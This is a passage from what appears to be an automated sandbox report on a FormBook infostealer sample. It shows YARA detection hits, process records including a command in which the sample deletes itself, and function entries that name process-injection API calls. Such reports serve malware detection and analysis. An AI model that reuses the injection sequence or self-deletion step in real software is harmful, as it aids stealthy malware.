                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.912181333.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.912181333.0000000000D50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.912181333.0000000000D50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: cmd.exe PID: 6664 Parent PID: 5960

                                                  General

                                                  Start time:08:30:52
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\AppData\Local\Temp\PO5411.exe'
                                                  Imagebase:0x11d0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: conhost.exe PID: 6644 Parent PID: 6664

                                                  General

                                                  Start time:08:30:53
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff724c50000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >

                                                    Analysis Process: PO5411.exe PID: 6788 Parent PID: 5860 PO5411.exeCOMMON

                                                    Executed Functions

                                                    Function 07386689, Relevance: 2.1, Strings: 1, Instructions: 807COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,L%l
                                                    • API String ID: 0-517424810
                                                    • Opcode ID: 403c87dd28fff6eb4812ac0e4eb5fdb6ae69e815505a8dcb9571cbfebebeca2a
                                                    • Instruction ID: 0e2c7359bb414143dc272ebaf5023aeb6755c54f70ae8d01c26abb7cc3b17ba2
                                                    • Opcode Fuzzy Hash: 403c87dd28fff6eb4812ac0e4eb5fdb6ae69e815505a8dcb9571cbfebebeca2a
                                                    • Instruction Fuzzy Hash: 1662DD70E102298FDB18DFA9D8806ADBBF3FF88304F24C569D459AB759CB34A945CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 073875E0, Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$l
                                                    • API String ID: 0-784925101
                                                    • Opcode ID: 51fd8a42b40f89ba664e0f83149fb3408ea98888f18f1d2865db6c5516764021
                                                    • Instruction ID: 0cfeac355bd6ed6f0896384aacdc4da7122f79aa8806eec2d53f4d9c1168a6a3
                                                    • Opcode Fuzzy Hash: 51fd8a42b40f89ba664e0f83149fb3408ea98888f18f1d2865db6c5516764021
                                                    • Instruction Fuzzy Hash: 35814972F102158FD754EB69DC90A9AB3E3AFC8714F2A8074E4099BB65DB34AC018B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07381AA0, Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$l
                                                    • API String ID: 0-784925101
                                                    • Opcode ID: 3c7d519762d72380fe88f611633c2a68357b150341f2d655f5e275da008db743
                                                    • Instruction ID: 53615505deb95f2d0dc064824671beae4243843cdc301ec159f7a29ab3cdfe1e
                                                    • Opcode Fuzzy Hash: 3c7d519762d72380fe88f611633c2a68357b150341f2d655f5e275da008db743
                                                    • Instruction Fuzzy Hash: BE816D72F101198FD754EB69D890BAEB3F3AFC4614F1A8178E409DB765DB74AC028B80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 073875D0, Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$l
                                                    • API String ID: 0-784925101
                                                    • Opcode ID: 595f73906d682097ca621a4645ec9a9ed064d43b69e9ffb31b8507ebc2b678ec
                                                    • Instruction ID: b56553e1a95c9de63a91f52b949580f0cc1f396238ef694ad2813caac70ea42c
                                                    • Opcode Fuzzy Hash: 595f73906d682097ca621a4645ec9a9ed064d43b69e9ffb31b8507ebc2b678ec
                                                    • Instruction Fuzzy Hash: 25814D72F202158FD754EBA9DC90B9EB3E3AFC4714F2A8174E4099B765DB74AC018B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07381DB2, Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 70327d2f6a604a62d26b4d1f55bcb572a5b4745775132b92c25481b47057bf3e
                                                    • Instruction ID: a185e5b97b3e1af48633629d67650ba4bd5748edbb6c893166a6a90a216cd8f7
                                                    • Opcode Fuzzy Hash: 70327d2f6a604a62d26b4d1f55bcb572a5b4745775132b92c25481b47057bf3e
                                                    • Instruction Fuzzy Hash: A851D271F102098FDB54EB7AD88466EB7F2FBC8215B18817AE609DB755DB30EC418B81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07380BDA, Relevance: .7, Instructions: 717COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8e46887222212ebea790df5ed4ded5a5f63f5bcb0b9cb8094560f2857bc2c10a
                                                    • Instruction ID: 11259693bb077e045ee85578d62c7d1bf3e4b3cc6eadbdb1a232055c9c7d09b1
                                                    • Opcode Fuzzy Hash: 8e46887222212ebea790df5ed4ded5a5f63f5bcb0b9cb8094560f2857bc2c10a
                                                    • Instruction Fuzzy Hash: 1352ACB4E112298FDB14DF69D890AADB7F2FF88304F18C569D45AEB748D734A942CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 073866D2, Relevance: .3, Instructions: 263COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ff4c5244a14c54290e9c66ce0f25490aa5394b20fdde668eaa298a5597c85345
                                                    • Instruction ID: 1b636d02e809d1cb26b851d8803767e1027dacfc573b0c9e8d545a2f955eeeaf
                                                    • Opcode Fuzzy Hash: ff4c5244a14c54290e9c66ce0f25490aa5394b20fdde668eaa298a5597c85345
                                                    • Instruction Fuzzy Hash: 5BA1BA35A006298FDB04DF79D8907AEB7F3AFC8305F11C569D806AB358DB34A9468B81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07387687, Relevance: .2, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6cafced4a5adbba8efe484cf950faf399b4f66fe18d182f4f4f71845bbba1de0
                                                    • Instruction ID: 9e68fe2192942b68c94b4d511c22ad9a57a7c460df7eda22a1130519f44acb43
                                                    • Opcode Fuzzy Hash: 6cafced4a5adbba8efe484cf950faf399b4f66fe18d182f4f4f71845bbba1de0
                                                    • Instruction Fuzzy Hash: DA614C72F201258FD754EB69DC90B9EB3E3AFC4614F2A8174E4099BB65DB74AC01CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07381B41, Relevance: .2, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44e94a7168caef878039b7c9267340af28de9213fdaff16fa724f25d606ab0c9
                                                    • Instruction ID: bbe96143c223671b9b6467b0dc7ffa4dfc9c63780256f83db453bfd0e01161a7
                                                    • Opcode Fuzzy Hash: 44e94a7168caef878039b7c9267340af28de9213fdaff16fa724f25d606ab0c9
                                                    • Instruction Fuzzy Hash: 2B613F72F105158FD754EB69DC90BAEB3E3AFC4614F1AC178D4099BB65DB74AC028B80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389F5D, Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0738A19E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: e55a61228eb7ad5e34f7111ccd103ed652885f0d1aa36535ba43a7b0e223b5da
                                                    • Instruction ID: bac80e737d1fddc7581561f981a1aba42b7b8d90327657b6413febef64f21eeb
                                                    • Opcode Fuzzy Hash: e55a61228eb7ad5e34f7111ccd103ed652885f0d1aa36535ba43a7b0e223b5da
                                                    • Instruction Fuzzy Hash: CCA15AB1D00319DFEB60DFA4C8407EDBBB2BB49314F14816AD859A7280DB759985CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389F68, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0738A19E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 77fd0d7b44ae9987b8302cea84e89ce9c14ca9e25425b7c09369f681f34c3364
                                                    • Instruction ID: a7e7197eed234eb51a85cf402628be147c069f44bf27c387b2e77fe67945313a
                                                    • Opcode Fuzzy Hash: 77fd0d7b44ae9987b8302cea84e89ce9c14ca9e25425b7c09369f681f34c3364
                                                    • Instruction Fuzzy Hash: 799159B1D00319DFEF60DFA4C8807EEBBB2BB49314F14816AD859A7240DB759985CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027AA1F0, Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 027AA436
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.782536825.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 2c1aeb38ba93be685716437cdd6e62ba1e3617f427e5ffd8b0644f651bca452e
                                                    • Instruction ID: b5fecb1ce222c4eab8caf4802058ce9266dcd3a8bb8e821e78eb6784d99b5ba8
                                                    • Opcode Fuzzy Hash: 2c1aeb38ba93be685716437cdd6e62ba1e3617f427e5ffd8b0644f651bca452e
                                                    • Instruction Fuzzy Hash: 83713370A00B058FDB24DF6AC45475ABBF1FF88324F108A2AD44ADBA40DB75E955CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0738BC44, Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 0738BD51
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: BaseModuleName
                                                    • String ID:
                                                    • API String ID: 595626670-0
                                                    • Opcode ID: 483b5bc3feb88110efd485ab71a342cbaf77cd92fb538e94be5685595ced1653
                                                    • Instruction ID: 83fecb9220d5059be19f5329f55f2df1350146fa828d40f0c38cd843b6f65902
                                                    • Opcode Fuzzy Hash: 483b5bc3feb88110efd485ab71a342cbaf77cd92fb538e94be5685595ced1653
                                                    • Instruction Fuzzy Hash: CC4155B1D0035AAFDB14DFA9C894BDEFBB1BF49314F148029E859AB250C7B4A845CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0738BC50, Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 0738BD51
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: BaseModuleName
                                                    • String ID:
                                                    • API String ID: 595626670-0
                                                    • Opcode ID: d21c47c959aae02f20ebc9d5ea351999dfffbd604b2d19bb9c6a2cadd154e013
                                                    • Instruction ID: 3f50e600f1dc8f25b4d39b5f9c560192104bc91c42262a9aaa1fffe8e19d85d4
                                                    • Opcode Fuzzy Hash: d21c47c959aae02f20ebc9d5ea351999dfffbd604b2d19bb9c6a2cadd154e013
                                                    • Instruction Fuzzy Hash: A64145B1D0034A9FDB54DFA9C494B9EFBB1BF49314F14C029E829AB350C7749845CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027A5E84, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 027A5F41
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.782536825.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 2675c839161fde7a81e084be205bfee90e12ed920c92436491590b50bc334a30
                                                    • Instruction ID: 33c86ed4d6669d3e1b93046a10fb4708477b7fd12a6fc2354e7e37983ba09a11
                                                    • Opcode Fuzzy Hash: 2675c839161fde7a81e084be205bfee90e12ed920c92436491590b50bc334a30
                                                    • Instruction Fuzzy Hash: D141E2B1C04719CBDB24CFA5C884B9DBBB1FF89318F208169D408AB255DBB56946CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027A48F8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 027A5F41
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.782536825.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: e11d31b4a47961a076e481f2b50e143bdb2bdc9d430cddcb7a576ec190ad3f45
                                                    • Instruction ID: f4915a4ae00d8093f9ab1ba43810217293ce82c4236cf468bad6e211ecf434aa
                                                    • Opcode Fuzzy Hash: e11d31b4a47961a076e481f2b50e143bdb2bdc9d430cddcb7a576ec190ad3f45
                                                    • Instruction Fuzzy Hash: FA41FFB0C04319CBDB24CFA9C884B9EBBB1FF89308F208169D408AB251D7B16946CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027A9E20, Relevance: 1.6, APIs: 1, Instructions: 75libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,027AA4B1,00000800,00000000,00000000), ref: 027AA6C2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.782536825.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 1dfc9fbe44e5d30a847b6c56cd91e47ba83018b4f77c15eb041f75118f26e0a0
                                                    • Instruction ID: ef652084e3c2d134483dedb67d3249609b7711d27b71a1659ae01b28890a6b8d
                                                    • Opcode Fuzzy Hash: 1dfc9fbe44e5d30a847b6c56cd91e47ba83018b4f77c15eb041f75118f26e0a0
                                                    • Instruction Fuzzy Hash: A421DCB28083488FDB10CFA9C884ADEBBF4EB9A324F05815AD415A7341D3B4A546CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389D99, Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07389E30
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 79e927dd6a2e9ae1348d4065c476f0e32f754919d4d891671575c141224e40de
                                                    • Instruction ID: bbb2c4b59fc83892e70c4cf35e5f06fecd7344cd24f41b0d532a231ee007c3ee
                                                    • Opcode Fuzzy Hash: 79e927dd6a2e9ae1348d4065c476f0e32f754919d4d891671575c141224e40de
                                                    • Instruction Fuzzy Hash: 6C2166B29043599FCB00DFA9C8847EEBBF4FF48314F00842AE958A7240C778A954CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0738B802, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 0738B8A3
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumProcesses
                                                    • String ID:
                                                    • API String ID: 84517404-0
                                                    • Opcode ID: 25592763569fb7a111a286c1a8b3279fd2e6bc296bd6c89123eeb28cfa59827e
                                                    • Instruction ID: c1bedadcc76153e7d2904aaa2d3caad8db63a855526c6ac6134811d870ed57af
                                                    • Opcode Fuzzy Hash: 25592763569fb7a111a286c1a8b3279fd2e6bc296bd6c89123eeb28cfa59827e
                                                    • Instruction Fuzzy Hash: DE2136B1D01659AFDB00CF99D885BDEFBB4FB49320F04812AE918A7740D778A954CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389490, Relevance: 1.6, APIs: 1, Instructions: 72fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CopyFileW.KERNELBASE(?,00000000,?), ref: 07389531
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: CopyFile
                                                    • String ID:
                                                    • API String ID: 1304948518-0
                                                    • Opcode ID: b1c740c276b2ffdf4d92d4e1b2b056361405a459dc2e36c3f2345e7d7a66fa99
                                                    • Instruction ID: 1129037ba057ffbc2dde75373cdc98c23689dbf14a0e08c3fa5f7a769e6fc164
                                                    • Opcode Fuzzy Hash: b1c740c276b2ffdf4d92d4e1b2b056361405a459dc2e36c3f2345e7d7a66fa99
                                                    • Instruction Fuzzy Hash: 312117B6D01219CFDB40CF99D4847EEBBF5FF48320F14816AE818A7240D7749A45CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389498, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CopyFileW.KERNELBASE(?,00000000,?), ref: 07389531
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: CopyFile
                                                    • String ID:
                                                    • API String ID: 1304948518-0
                                                    • Opcode ID: 11df006a84b460ee7eff9e95dada34de1b5ffd70b351c68e8ef537fe71d4817a
                                                    • Instruction ID: 96df3e1fa28d06c4cf50cfd0558388f6ee641bdff7e2a6737ba533106bdf6e86
                                                    • Opcode Fuzzy Hash: 11df006a84b460ee7eff9e95dada34de1b5ffd70b351c68e8ef537fe71d4817a
                                                    • Instruction Fuzzy Hash: F8212AB1D013199FDB50CF9AD4847EEFBF4EF49320F14816AE818A7241D774AA44CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389DA0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07389E30
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: b53252b4a0ccff594a3b74196dc686664e7eb20eac1d5fd2f368f5c8dc65c731
                                                    • Instruction ID: e31138db46e9d4e76861934415f9e9714ce6e96117dd6e8412c896a604cac6dd
                                                    • Opcode Fuzzy Hash: b53252b4a0ccff594a3b74196dc686664e7eb20eac1d5fd2f368f5c8dc65c731
                                                    • Instruction Fuzzy Hash: 192125B19003599FCF50DFA9C884BEEBBF5FF48314F00842AE959A7240C778A954CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389C01, Relevance: 1.6, APIs: 1, Instructions: 68threadinjectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 07389C86
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: ContextThread
                                                    • String ID:
                                                    • API String ID: 1591575202-0
                                                    • Opcode ID: bd1492432272672d43f438ff42403683628a47e9f94483116424694decdf3953
                                                    • Instruction ID: 97a2366eff776828d58d0ce6ece80810a0419af0e1f68d8c7f4298c65f306b49
                                                    • Opcode Fuzzy Hash: bd1492432272672d43f438ff42403683628a47e9f94483116424694decdf3953
                                                    • Instruction Fuzzy Hash: 952189B19003098FCB00DFAAC4847EEBBF4EF48324F14802AD958A7240CB78A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027AA190, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027AC3DE,?,?,?,?,?), ref: 027AC49F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.782536825.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 44ea3cad64d3e5656aae0cd062d3f11e6b44dd81a52d1863930b88a99941b7a9
                                                    • Instruction ID: 8ca2033dbdcce338d436324f33d1b7365949b88260ce41862b2a4d4e4c9d699d
                                                    • Opcode Fuzzy Hash: 44ea3cad64d3e5656aae0cd062d3f11e6b44dd81a52d1863930b88a99941b7a9
                                                    • Instruction Fuzzy Hash: 2B21E3B5900258AFDB10CFA9D584AEEFBF8FB48324F14812AE914B3310D374A954CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0738BF99, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumChildWindows.USER32(?,00000000,?), ref: 0738C018
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID:
                                                    • API String ID: 3555792229-0
                                                    • Opcode ID: bf05d23ec750094d5fdd4e58671be782a74874e768b3e4c3009a283e4ab63634
                                                    • Instruction ID: 30039c600d860dd1cc8b02056d6dea1c15eb7e4392f9f0f6cd62e251493d9f0e
                                                    • Opcode Fuzzy Hash: bf05d23ec750094d5fdd4e58671be782a74874e768b3e4c3009a283e4ab63634
                                                    • Instruction Fuzzy Hash: D32159B19002098FDB10DFA9D844BEEFBF4EF88350F04842AE468A3240C778A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0738A56C, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumChildWindows.USER32(?,00000000,?), ref: 0738C018
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID:
                                                    • API String ID: 3555792229-0
                                                    • Opcode ID: 7e702e6c97c66cef795708a0187bb0edbf4b3c9832f7493360f97bd5c46e4b1d
                                                    • Instruction ID: cb87ab7d3c4a9bc5988b31523d0e6e45f7ca2aa91b16084985c0ad220372784d
                                                    • Opcode Fuzzy Hash: 7e702e6c97c66cef795708a0187bb0edbf4b3c9832f7493360f97bd5c46e4b1d
                                                    • Instruction Fuzzy Hash: 0F216AB19042099FDB50DF9AD844BEEFBF4EF88314F00842AE429A3350D774A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389C08, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 07389C86
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: ContextThread
                                                    • String ID:
                                                    • API String ID: 1591575202-0
                                                    • Opcode ID: 1d822592c3d294b0e75fe9bf049e48f12abf939dc1f89a713dbab22f7f757395
                                                    • Instruction ID: 6d5baa1242213afd6ac6cc0d7d8adab3ab54a6aa27c28455cfd197eab1c0606a
                                                    • Opcode Fuzzy Hash: 1d822592c3d294b0e75fe9bf049e48f12abf939dc1f89a713dbab22f7f757395
                                                    • Instruction Fuzzy Hash: 092138B19003098FDB50DFAAC4847EEBBF4EF48224F148429D559A7240CB78A945CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027AA652, Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,027AA4B1,00000800,00000000,00000000), ref: 027AA6C2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.782536825.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 09ca50dd7e11d0fab4e4968be95b559099b52604e8d9fd883acd765bc60d016e
                                                    • Instruction ID: f5fae584d0363122ebfc348ef9b93a98786c604a39cfcff7d0582ebe71fd5241
                                                    • Opcode Fuzzy Hash: 09ca50dd7e11d0fab4e4968be95b559099b52604e8d9fd883acd765bc60d016e
                                                    • Instruction Fuzzy Hash: D02134B2D002089FCB10CF99E488ADEFBB4FB98364F04852AD565A7600C7B59515CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389450, Relevance: 1.6, APIs: 1, Instructions: 62fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CopyFileW.KERNELBASE(?,00000000,?), ref: 07389531
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: CopyFile
                                                    • String ID:
                                                    • API String ID: 1304948518-0
                                                    • Opcode ID: b40c7055fd96c814a82b79347f5000f0b99a796d9cf46c46b4e41a24a7d9d409
                                                    • Instruction ID: d4d5e471755b854af8bc0e14462b56d5772d4a8a8571938f4d7077997f19b778
                                                    • Opcode Fuzzy Hash: b40c7055fd96c814a82b79347f5000f0b99a796d9cf46c46b4e41a24a7d9d409
                                                    • Instruction Fuzzy Hash: F9117FF6D003168FEB54CF59C4447FEBBF4AF88220F19816AE818A7351D774AA41CBA1
